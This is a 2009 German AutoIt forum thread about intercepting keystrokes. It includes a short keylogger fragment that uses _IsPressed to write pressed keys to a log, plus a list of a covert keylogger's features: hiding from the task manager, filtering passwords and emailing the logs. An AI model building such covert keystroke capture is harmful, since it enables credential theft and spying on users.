kann man Tastendrücke abfangen?

  • Doch, "IsPressed" hilft sogar sehr.

    Mal ein Beispiel aus Ghost kopiert:

    [autoit]


    Local $CAPSLOCKTOGGLE = 0

    [/autoit][autoit][/autoit][autoit]

    If _IsPressed ('14') = 1 Then
    If $CAPSLOCKTOGGLE = 1 Then
    $CAPSLOCKTOGGLE = 0
    ElseIf $CAPSLOCKTOGGLE = 0 Then
    $CAPSLOCKTOGGLE = 1
    EndIf
    EndIf

    [/autoit][autoit][/autoit][autoit]

    If _IsPressed ('46') = 1 Then
    If $CAPSLOCKTOGGLE = 0 Then
    FileWrite($log,"f")
    Else
    FileWrite($log,"F")
    EndIf

    [/autoit]

    Mehr kopiere ich mal nicht, ihr wisst schon zuviel :rofl:

  • Wenn ich das mal so sagen darf:
    Jeder depp, der min. 3 Wochen hier mitliest, kann sich nen Keylogger bauen!

    Aus dem Script wo ich gemacht hab ( siehe seite 1 ) kann man sich auch ganz leicht einen basteln ...

  • Ich habe keylogger Autoit in einer suchmaschine eingeben und habe gleich einen Keylogger gefunden.
    Aber ich versteh immer noch nicht wie mir der helfen soll.
    Denn man schreibt ja dann immer noch den Schwachsinn oder? :S
    Ich hab mir gedacht dass das vielleicht in Kombination mit Blockinput(0) gehen würde

  • Um ehrlich zu sein hab ich immernoch nich wirklich dein Problem verstanden.. Kannstu das nochmal für Dummies erklären? :D

  • Und wie sieht's denn jetzt mit meinem Lösungsvorschlag aus ? ^^

    Und Sen - _IsPressed ist doch inzwischen begründet verworfen worden ? ;)

    There are only 10 types of people in the world:
    Those who understand binary - and those who don't.

  • Also jetzt nochmal so dass es jeder Depp versteht(kleiner Scherz am Rande) :rofl:
    Muss zugeben habs richtig schlecht erklärt.

    Ich will ein Programm schreiben in dem man einfach auf die Tasten haut und Trotzdem die Zwischenablage ausgegeben wird. Mein Problem der Text soll nur ausgeben werden wenn man schreibt (asldkhgasldhjifglasef) und wie gesagt der Text aus der Zwischenablage ausgegeben werden natürlich ohne den Schwachsinn (dgfhdrdgf). Ausserdem soll man korrigieren könnnen (Enter, Backslash). Ausserdem will ich noch einen Hotkey für Normalschreiben ohne Zwischenablage ausgeben machen.

    Hoffe ich habs gut erklärt wenn nich könnt Ihr einfach fragen.
    Es gibt so wie des schon vermutet hast ein paar komplikationen mit dem zuschnellschreiben

    Hey Danke jetzt gehts voll.
    Ich habe vor writeone und nach writeone einen Blockinput gemacht einmal 1 und beim zweitenmal null

    Danke nochmals an alle :rock:

    3 Mal editiert, zuletzt von Broken_Arrow (22. Mai 2009 um 18:46)

  • Eins muss ich hier grad nochmal loswerden.

    Wenn ihr hier schon lesen könnt das Keylogger wie mein Ghost illegal sind warum bekomme
    ich dann solche PM's?

    Nummer 1..


    Nachricht von "n00b": Ghost
    Hallo Sen,

    "n00b" hat dir auf der Website: .: autoit.de :. - Das deutsche AutoIt-Forum (http://www.autoit.de) folgende Nachricht gesandt:
    Hey, ich hab so was ähnliches auch mal gemacht!
    Mich würd's interessieren, wie du es gemacht hast!
    Hoffe, das ist nicht zu viel verlangt.

    Und nr. 2


    Nachricht von "Broken_Arrow": kannst du mir den Keylogger geben?
    Hallo Sen,

    "Broken_Arrow" hat dir auf der Website: .: autoit.de :. - Das deutsche AutoIt-Forum (http://www.autoit.de) folgende Nachricht gesandt:
    Wenn ich das richtig verstanden habe, kann man damit die Tasten abfangen oder.
    Ich werde auch nichts unanständiges damit anfangen. ausserdem hab ich noch nicht so viel Erfahrung um so etwas programmieren zu können.

    Ist dass wirklich illegal (vom Stadt verboten) oder ist das nur im Forum so?

    Es nervt.
    Und NEIN ich gebe Ghost nicht raus.
    Dient allein zu meinen Zwecken :rofl:

  • Nummer 1: Ich finde es gemein, dass du hier die Leute so hinterhälltig lächerlich machen willst!

    Nummer 2: Dein Ghost-Ding, kann wirklich jeder basteln oder ergooglen (englisches Forum), der sich maximal eine woche mit autoit auseinandergesetzt hat! Und außerdem kannstu in deinem Code dein Capslocktoggle umgehen und dabei ne menge DllCalls sparen (Stichwort:KeyBoardLayout)..

  • Zu 1:
    Ich mache hier keinen lächerlich,
    ich finde es eher lächerlich wenn man weiß das etwas illegal ist noch eine PM zu senden.

    Zu 2:
    Dann zeig mir nen Typen der nen Keylogger der
    -> Tasten mitschreibt
    -> Maus mitschreibt
    -> Aktivierte Fenster mitschreibt
    -> Passwörter/Usernamen filtert
    -> Netzwerk mitschreibt
    -> in regelmäßigen abständen die zwischenablage sichert
    -> Nicht sichtbar ist (weder taskbar noch manager)
    -> Keine CPU leistung zieht (0-1%)
    -> Username/PcName/Ip mitschreibt
    und
    ->Das ganze per Mail sendet enn der Pc herunterfährt

    in einer Woche schreibt und AutoIt vorher nicht kannte.

    Is auch egal,
    ich würde nur gerne nicht weiter mit Mails angeschrieben wie:
    -> Schickst du mir GHost?
    -> Sind Keylogger Illegal?

    JA sie sind illegal,
    NEIN ich sende euch Ghost nicht.

  • Es muss ja kein so ausgefeilter sein, wie dein Ghost...
    Die wesendlichen dinge, wie z.B. Tasten mitschreiben, Mausklicks mitschreiben,
    Fensteraktivitäten mitschreiben...
    bekommt denke ich fast jeder hin, der 1 - 3 Wochen hier ist.

    Ich finde aber, dass das Thema Keylogger nun genug dikudiert wurde.
    Ich seh es noch kommen, dass daraus ein Wettbewerb wird, wer den bessten keylogger machen kann -.-

    Also, pls b2t...